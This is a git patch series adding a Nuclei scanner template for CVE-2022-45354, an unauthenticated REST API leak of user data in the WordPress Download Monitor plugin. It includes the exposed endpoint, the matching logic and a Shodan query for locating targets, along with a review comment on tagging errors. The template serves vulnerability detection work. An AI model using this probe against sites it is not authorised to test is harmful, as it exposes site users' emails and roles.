From 5a2cd2b88ad6a245ebc0f52982fe32bea4c7a623 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 12 Jul 2023 01:24:50 +0530
Subject: [PATCH 1/3] Create CVE-2022-45354.yaml
---
 http/cves/2022/CVE-2022-45354.yaml | 39 ++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 http/cves/2022/CVE-2022-45354.yaml
diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml
new file mode 100644
index 00000000000..52833a2ba86
--- /dev/null
+++ b/http/cves/2022/CVE-2022-45354.yaml
@@ -0,0 +1,39 @@
+id: CVE-2022-45354
+
+info:
+ name: Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)
+ reference:
+ - https://github.com/RandomRobbieBF/CVE-2022-45354
+ - https://wordpress.org/plugins/download-monitor/
+ metadata:
+ verified: true
+ shodan-query: html:"/wp-content/plugins/download-monitor/"
+ max-request: 1
+ tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/download-monitor/v1/user_data"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"registered":'
+ - '"display_name":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - application/json
+
+ - type: status
+ status:
+ - 200
From 836fb614d57b500a39b16b25b1bddb7ec30f9368 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 12 Jul 2023 01:27:47 +0530
Subject: [PATCH 2/3] fix-template
---
 http/cves/2022/CVE-2022-45354.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
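Review bot: The `tags` line in the new template carries `cve2023` although the id is CVE-2022-45354 and the file sits under http/cves/2022/, so a run filtered by the year tag would skip this check; it should read `tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp`. The two follow-up patches in this series only touch `author` and `name`, so the tag stays wrong after all three are applied. The `info` block also has no `classification` entry (at least `cve-id: CVE-2022-45354`) and no `remediation` line telling operators to update Download Monitor to a release later than 4.7.60, both of which help triage once the matchers fire.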
diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml
index 52833a2ba86..ee6e7085f24 100644
--- a/http/cves/2022/CVE-2022-45354.yaml
+++ b/http/cves/2022/CVE-2022-45354.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-45354

 info:
 name: Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API
- author: DhiyaneshDK
+ author: DhiyaneshDK
 severity: medium
 description: |
 The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)
From 7d70eaa50dba10f37f8498d80e494543f67e8c31 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Wed, 12 Jul 2023 11:47:34 +0530
Subject: [PATCH 3/3] Update CVE-2022-45354.yaml
---
 http/cves/2022/CVE-2022-45354.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml
index ee6e7085f24..9108a134623 100644
--- a/http/cves/2022/CVE-2022-45354.yaml
+++ b/http/cves/2022/CVE-2022-45354.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-45354

 info:
- name: Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API
+ name: Download Monitor <= 4.7.60 - Sensitive Information Exposure
 author: DhiyaneshDK
 severity: medium
 description: |